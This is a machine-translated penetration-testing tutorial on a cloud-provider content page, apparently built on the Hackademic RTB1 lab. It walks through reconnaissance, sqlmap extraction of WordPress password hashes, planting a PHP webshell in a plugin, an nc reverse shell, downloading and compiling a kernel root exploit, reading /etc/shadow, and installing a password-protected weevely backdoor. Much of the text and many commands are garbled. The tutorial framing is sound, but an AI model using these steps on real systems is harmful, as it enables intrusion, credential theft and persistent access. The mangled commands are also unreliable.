From information collection to intrusion rights (penetration Test Basics Summary)

Source: Internet
Author: User
Tags website server domain name registration wordpress database



Through this article you will understand the hacker commonly used ideas and techniques, suitable for love of network information security Novice friends to learn. This article begins with the first collection of information about how hackers are stepping through your site and server. Read this article and you'll learn the following:






Use of 2.sqlmap



Use of 3.nmap



4.nc Bounce Right



Elevation of privilege for 5.linux systems



6.backtrack 5 penetration test Tool Nikto and W3AF use, etc.



Suppose the hacker is going to invade your website domain name: hack-test.com



Let's use the ping command to get the IP address of the Web server.






Now we get the IP address of the Web server: 173.236.138.113



To find other sites on the same server, we use sameip.org.






Sites hosted on IP Address 173.236.138.113


Id Domain Site Link
1 Hijackthisforum.com Hijackthisforum.com
2 Sportforum.net Sportforum.net
3 Freeonlinesudoku.net Freeonlinesudoku.net
4 Cosplayhell.com Cosplayhell.com
5 videogamenews.org videogamenews.org
6 Gametour.com Gametour.com
7 Qualitypetsitting.net Qualitypetsitting.net
8 Brendanichols.com Brendanichols.com
9 8ez.com 8ez.com
10 Hack-test.com Hack-test.com
11 Kisax.com Kisax.com
12 Paisans.com Paisans.com
13 Mghz.com Mghz.com
14 Debateful.com Debateful.com
15 Jazzygoodtimes.com Jazzygoodtimes.com
16 Fruny.com Fruny.com
17 Vbum.com Vbum.com
18 Wuckie.com Wuckie.com
19 Force5inc.com Force5inc.com
20 Virushero.com Virushero.com
21st Twincitiesbusinesspeernetwork.com Twincitiesbusinesspeernetwork.com
22 Jennieko.com Jennieko.com
23 Davereedy.com Davereedy.com
24 Joygarrido.com Joygarrido.com
25 Prismapp.com Prismapp.com
26 Utiligolf.com Utiligolf.com


There are 26 websites on 173.236.138.113, many hackers may check other websites on the same server in order to hack your website, but this is a research goal, we will throw away other websites on the server, only for your website to conduct intrusion detection.



We ' ll need more information about your site, such as:



We need the following information about your website:


    1. DNS Records (A, NS, TXT, MX and SOA)
    2. Web Server Type (Apache, IIS, Tomcat)
    3. Registrar (the company, owns your domain)
    4. Your name, address, email and phone
    5. Scripts that your site uses (PHP, ASP, ASP., JSP, CFM)
    6. Your Server OS (Unix,linux,windows,solaris)
    7. Your Server Open ports to the Internet (443, etc)


Let's start looking for your site's DNS records, we use who.is to accomplish this goal.






We found that your DNS records are as follows






Let's determine the type of Web server






Discover that your W EB server is Apache and then determine its version.



HACK-TEST.COM SITE INFORMATION



IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7



Next is the time to find your website domain name registration information, your phone, email, address and so on.






We have now obtained the registration information of your website domain name, including your important information. We can get your website server OS type and server version via Whatweb in Backtrack 5.









We found your website using the famous PHP whole station program WordPress, the server's system type for Fedora Linux,web Server version Apache 2.2.15. Continue to view Web server open ports, using the Penetration test tool Nmap:



1-find Services, the run on server (view service running on the server)




2-find Server OS (view OS version)




Only the 80 ports are open, the operating system is Linux2.6.22 (Fedora Core 6), and now we have collected all the important information about your site, and then start scanning for vulnerabilities such as:



SQL Injection–blind SQL INJECTION–LFI–RFI–XSS–CSRF and so on.



We will use Nikto to collect vulnerability information:



[Email protected]:/pentest/web/nikto# perl nikto.pl-h hack-test.com




We will also use the W3AF tool in backtrack 5 R1:



[Email protected]:/pentest/web/w3af#./w3af_gui






We enter the address of the website to be detected and select the Complete security audit option.






Wait a moment, and you'll see the results of the scan.






Discover that your site has SQL injection vulnerabilities, XSS vulnerabilities, and other vulnerabilities. Let's explore SQL injection vulnerabilities.



http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220



We found this URL with a SQL injection through the tool, and we detected the URL through Sqlmap.



Using sqlmap with–u URL






After a while, you'll see






Enter N Press ENTER to continue






We found that your site exists MySQL error injection, MySQL database version is 5.0. We try to collect the database name by adding the parameter "-dbs".









Found three databases, followed by the parameter "-D wordpress-tables" To view all the table names of the WordPress database









Use the parameter "-T wp_users–columns" to view the fields in the Wp_users table.









Next, guess the values for the fields User_login and User_pass. With the parameter "-C User_login,user_pass–dump"






We will find the user name and password hashes value. We need to hack the password through the following online hack website hashes



http://www.onlinehashcrack.com/free-hash-reverse.php






Login WordPress Backstage Wp-admin



Try uploading PHP Webshell to the server to make it easy to run some Linux commands. Look for any plugins you can edit on the plugins page. We choose textile This plugin, edit insert our PHP webshell, click Update file, then visit our PHP Webshell.









PHP Webshell is parsed, we can control the file of your website, but we only want to get the root of the Web server, to invade the other sites on the server.



We use NC to bounce a shell, first listening on 5555 ports on our computer.






Then connect our computer in reverse on PHP webshell, enter your IP and port 5555.






Click Connect and we'll see









Next we try to execute some commands:



Id

uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
(Used to display the user's ID and group)



Pwd

/var/www/html/hackademic_rtb1/wp-content/plugins
(Displays the current path on the server)



Uname-a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux
(Displays kernel version information)






Now we know that the kernel version of the server is 2.6.31.5-127.fc12.1686, and we are searching the exploit-db.com for a related vulnerability in this version.
After testing a lot of exp on the server, we use the following exp to elevate the permissions.
http://www.exploit-db.com/exploits/15285
 
We execute the following command on the NC Shell:
wget/http/ Www.exploit-db.com/exploits/15285-o roro.c
(download exp to server and rename to roro.c)
Note: The exp of many Linux kernels is developed in C language, So we save the. c extension.
Exp RORO.C code is as follows:
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include < Netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
# Include <sys/utsname.h>
#define Recvport 5555
#define SendPort 6666
int prep_sock (int port)
{
int S, ret;
struct sockaddr_in addr;
S = socket (pf_rds, sock_seqpacket, 0);
if (S < 0)
{
printf ("[*] Could not open socket.\n");
Exit (-1);
}
memset (&addr, 0, sizeof (addr));




Through the above code we found that EXP is developed in C language, we need to compile him into the elf format, the command is as follows:

GCC Roro.c–o RoRo

Next execute the compiled exp

./roro










We enter the ID command after execution is complete.

Id

We've found that we're already rooted.

Uid=0 (Root) gid=0 (root)







We can now view the/etc/shadow file
Cat/etc/shadow







View/etc/passwd File



cat/etc/passwd







We can use the "John the Ripper" tool to hack passwords for all users. But we won't do that, we need to leave the back door on this server to make it easier for us to access it at any time.



We use weevely to make a PHP small immediately upload to the server.



1.weevely Use options
[Email protected]:/pentest/backdoors/web/weevely#./main.py–



2. Create a PHP backdoor with weevely with a password of Koko



[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko






Then upload it to the server and use it.
[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-U http://hack-test.com/Hackademic_RTB1/wp-content/ Plugins/hax.php-p Koko







Test our hax.php back door.






Summarize:



Some of the technologies we've learned in this article are being hacked into your website and servers, and we hope this article will help you maintain your server and website security in the future.




Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.